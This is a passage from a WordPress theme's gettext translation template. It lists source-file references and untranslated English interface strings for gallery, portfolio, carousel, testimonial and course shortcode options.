framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:40 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:160 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:28 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:33 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:39 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:152 #: framework-customizations/extensions/portfolio/config.php:70 msgid "Gallery" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:14 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:25 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:48 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:236 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:30 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:53 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:220 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:29 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:52 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:212 #: framework-customizations/extensions/portfolio/config.php:59 #: framework-customizations/extensions/portfolio/config.php:60 #: framework-customizations/theme/config.php:536 #: framework-customizations/theme/options/template-settings.php:231 msgid "Portfolio" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:24 #: framework-customizations/theme/options/page-header-settings.php:221 msgid "Post Title" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:30 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:39 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:44 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:43 msgid "-All Gallery-" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:35 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:52 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:57 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:56 msgid "-All Portfolio-" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:55 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:72 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:76 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:75 msgid "Post Type" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:60 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:76 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:80 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:79 msgid "Choose post type to show" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:64 msgid "Choose Gallery" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:71 msgid "Choose special gallery to show list of gallery images in the post." msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:75 msgid "Choose Portfolio" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:82 msgid "Choose special portfolio to show list of gallery images in the post." msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:108 msgid "Limit Images" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:111 msgid "" "Add number of images to display. If it blank, display all gallery images" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:128 msgid "Please input number of item show in slider." msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:137 #: framework-customizations/extensions/instagram/shortcodes/instagram/vc_options.php:110 #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:174 #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:55 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:191 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:270 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:326 msgid "Is Auto Play ?" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:141 #: framework-customizations/extensions/instagram/shortcodes/instagram/vc_options.php:114 #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:181 #: framework-customizations/extensions/shortcodes/shortcodes/content-carousel/vc_options.php:61 #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:59 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:195 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:342 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:274 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:330 msgid "Choose YES to slide auto play." msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:146 msgid "Show Dots Navigation ?" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:150 msgid "Choose YES to show dots navigation." msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:155 msgid "Show Arrows Navigation ?" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:159 msgid "Choose YES to show arrows navigation." msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:173 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:242 msgid "Arrows Color" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:176 msgid "Choose color to slide arrows." msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:185 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:254 msgid "Arrows Hover Color" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:188 msgid "Choose hover color to slide arrows." msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:197 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:266 msgid "Arrows Background Color" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:200 msgid "Choose background color to slide arrows." msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:209 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:278 msgid "Arrows Background Hover Color" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:212 msgid "Choose background hover color to slide arrow." msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:221 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:230 msgid "Dots Color" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:224 msgid "Choose color to slide dots." msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:233 msgid "Dots Color Active" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:236 msgid "Choose color to slide dots when active, hover." msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/views/layout-6.php:48 msgid "All gallery" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/views/layout-6.php:60 msgid "VIEW MORE" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/config.php:9 msgid "SLZ Gallery Grid" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/config.php:10 msgid "List of galleries in grid" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/config.php:20 #: framework-customizations/extensions/gallery/shortcodes/isotope/config.php:21 #: framework-customizations/extensions/headers/headers/header-09/options/menu.php:27 #: framework-customizations/extensions/headers/headers/header-09/options/search_box.php:12 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-uni-search-box.php:46 #: framework-customizations/extensions/shortcodes/shortcodes/count-down/vc_options.php:7 #: framework-customizations/extensions/shortcodes/shortcodes/main-title/options/layout-1.php:6 #: framework-customizations/extensions/shortcodes/shortcodes/newsletter/config.php:23 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:41 #: framework-customizations/extensions/shortcodes/shortcodes/progress-bar/options/layout-1.php:7 #: framework-customizations/extensions/teams/shortcodes/team-block/options/layout-1.php:6 msgid "New York" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/config.php:21 #: framework-customizations/extensions/gallery/shortcodes/isotope/config.php:22 #: framework-customizations/extensions/headers/headers/header-09/options/menu.php:28 #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:42 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/options/layout-1.php:7 #: framework-customizations/extensions/shortcodes/shortcodes/item-list/vc_options.php:10 #: framework-customizations/extensions/shortcodes/shortcodes/main-title/options/layout-1.php:8 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:43 #: framework-customizations/extensions/shortcodes/shortcodes/progress-bar/options/layout-1.php:8 msgid "Illinois" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/config.php:22 #: framework-customizations/extensions/gallery/shortcodes/isotope/config.php:23 #: framework-customizations/extensions/headers/headers/header-09/options/menu.php:29 #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:43 #: framework-customizations/extensions/shortcodes/shortcodes/item-list/vc_options.php:11 #: framework-customizations/extensions/shortcodes/shortcodes/main-title/options/layout-1.php:9 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:42 msgid "Connecticut" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/config.php:23 #: framework-customizations/extensions/gallery/shortcodes/isotope/config.php:24 #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:45 #: framework-customizations/extensions/shortcodes/shortcodes/main-title/options/layout-1.php:7 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:39 msgid "Texas" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/config.php:24 #: framework-customizations/extensions/gallery/shortcodes/isotope/config.php:25 #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:47 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:40 msgid "Arizona" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:10 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:9 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:8 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:102 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list-filtered.php:82 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list.php:75 #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:7 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:29 msgid "Five" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:43 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:48 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:47 msgid "-All Gallery Categories-" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:56 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:61 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:60 msgid "-All Portfolio Categories-" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:59 msgid "-All Authors-" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:84 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:67 #: framework-customizations/extensions/instagram/shortcodes/instagram/vc_options.php:49 #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:157 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:228 #: framework-customizations/extensions/shortcodes/shortcodes/item-list/vc_options.php:89 #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:195 #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:208 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:16 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:255 #: framework-customizations/theme/options/template-settings.php:282 #: framework-customizations/theme/options/template-settings.php:352 #: framework-customizations/theme/options/template-settings.php:422 msgid "Column" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:110 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:112 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:104 msgid "Select order to display." msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:121 #: framework-customizations/theme/options/post-settings.php:153 #: framework-customizations/theme/options/post-settings.php:239 #: framework-customizations/theme/options/speed-optimize.php:60 #: includes/class-breadcrumb.php:250 msgid "Author" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:127 msgid "Add Author" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:130 msgid "Choose special author to filter" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:134 msgid "Choose author to filter." msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:145 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:129 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:121 msgid "Choose gallery category or special gallery to display" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:167 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:151 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:143 msgid "Choose Gallery Category." msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:182 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:166 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:158 msgid "Add Gallery" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:185 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:169 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:161 msgid "Choose special gallery to show" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:190 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:174 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:166 msgid "" "Default display All Gallery if no gallery is selected and Number gallery is " "empty." msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:205 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:189 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:181 msgid "Choose portfolio category or special portfolio to display" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:227 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:211 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:203 msgid "Choose Portfolio Category." msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:242 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:226 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:218 msgid "Add Portfolio" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:245 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:229 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:221 msgid "Choose special portfolio to show" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:250 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:234 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:226 msgid "" "Default display All Portfolio if no portfolio is selected and Number " "portfolio is empty." msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:262 msgid "Show Tab Filter" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:266 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:250 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:242 msgid "Choose if you want to show category filter tab or not." msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:267 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:275 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:289 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:301 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:314 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:323 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:336 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:349 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:251 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:260 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:273 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:282 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:295 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:303 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:316 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:115 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:124 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:133 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:142 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:151 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:160 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:171 msgid "Extra Options" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:271 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:260 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list-filtered.php:93 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list.php:85 msgid "Show Pagination" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:274 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:263 msgid "Choose if you want to show pagination." msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:284 msgid "Filter Alignment" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:288 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:259 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:251 msgid "Choose alignment for category filter." msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:297 msgid "Load More Button Content" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:300 msgid "Enter load more button content to display." msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:309 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:120 msgid "Show Title" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:313 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:272 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:289 msgid "Choose if you want to show title or not." msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:318 msgid "Show Category" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:322 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:281 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:302 msgid "Choose if you want to show category or not." msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:331 msgid "Show Read More Button" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:335 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:294 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:341 msgid "Choose if you want to show read more button or not." msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:344 msgid "Show Zoom Button" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:348 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:315 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:354 msgid "Choose if you want to show fancybox zoom in or not." msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:356 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:323 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:362 msgid "Tab Filter Color" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:359 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:326 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:365 msgid "Choose a custom tab filter color." msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:360 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:372 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:384 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:396 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:404 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:413 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:425 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:437 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:449 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:327 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:339 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:351 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:363 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:371 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:383 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:395 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:407 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:415 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:366 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:378 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:390 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:402 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:414 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:426 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:438 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:450 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:462 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:474 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:486 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:498 #: framework-customizations/extensions/lema/shortcodes/featured-course/vc_options.php:120 #: framework-customizations/extensions/lema/shortcodes/featured-course/vc_options.php:127 #: framework-customizations/extensions/lema/shortcodes/featured-course/vc_options.php:134 #: framework-customizations/extensions/lema/shortcodes/featured-course/vc_options.php:141 #: framework-customizations/extensions/lema/shortcodes/featured-course/vc_options.php:148 #: framework-customizations/extensions/lema/shortcodes/featured-course/vc_options.php:155 #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:140 #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:148 #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:156 #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:164 #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:172 #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:180 #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:188 #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:196 #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:204 #: framework-customizations/extensions/shortcodes/shortcodes/newsletter/vc_options.php:87 #: framework-customizations/extensions/shortcodes/shortcodes/newsletter/vc_options.php:94 #: framework-customizations/extensions/shortcodes/shortcodes/newsletter/vc_options.php:101 #: framework-customizations/extensions/shortcodes/shortcodes/newsletter/vc_options.php:108 #: framework-customizations/extensions/shortcodes/shortcodes/newsletter/vc_options.php:115 #: framework-customizations/extensions/shortcodes/shortcodes/newsletter/vc_options.php:122 #: framework-customizations/extensions/shortcodes/shortcodes/newsletter/vc_options.php:129 #: framework-customizations/extensions/shortcodes/shortcodes/newsletter/vc_options.php:136 #: framework-customizations/extensions/shortcodes/shortcodes/newsletter/vc_options.php:143 #: framework-customizations/extensions/shortcodes/shortcodes/timeline/options/layout-1.php:75 #: framework-customizations/extensions/shortcodes/shortcodes/timeline/options/layout-1.php:82 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-1.php:26 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-1.php:37 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-1.php:49 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-2.php:32 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-2.php:43 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-2.php:55 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-4.php:27 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-4.php:38 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-4.php:50 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-5.php:26 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-5.php:33 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-5.php:41 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:196 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:208 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:216 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:224 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:237 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:249 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:261 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:273 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:286 msgid "Custom CSS" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:368 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:335 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:374 msgid "Tab Active Color" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:371 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:338 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:377 msgid "Choose a custom tab active color." msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:380 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:347 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:386 msgid "Category Color" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:383 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:350 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:389 msgid "Choose a custom category color." msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:395 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:362 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:401 msgid "Choose a custom title color." msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:400 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:367 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:410 #: framework-customizations/extensions/lema/shortcodes/course-collection/options/layout-2.php:41 #: framework-customizations/extensions/lema/shortcodes/featured-course/vc_options.php:124 #: framework-customizations/extensions/shortcodes/shortcodes/contact/vc_options.php:102 #: 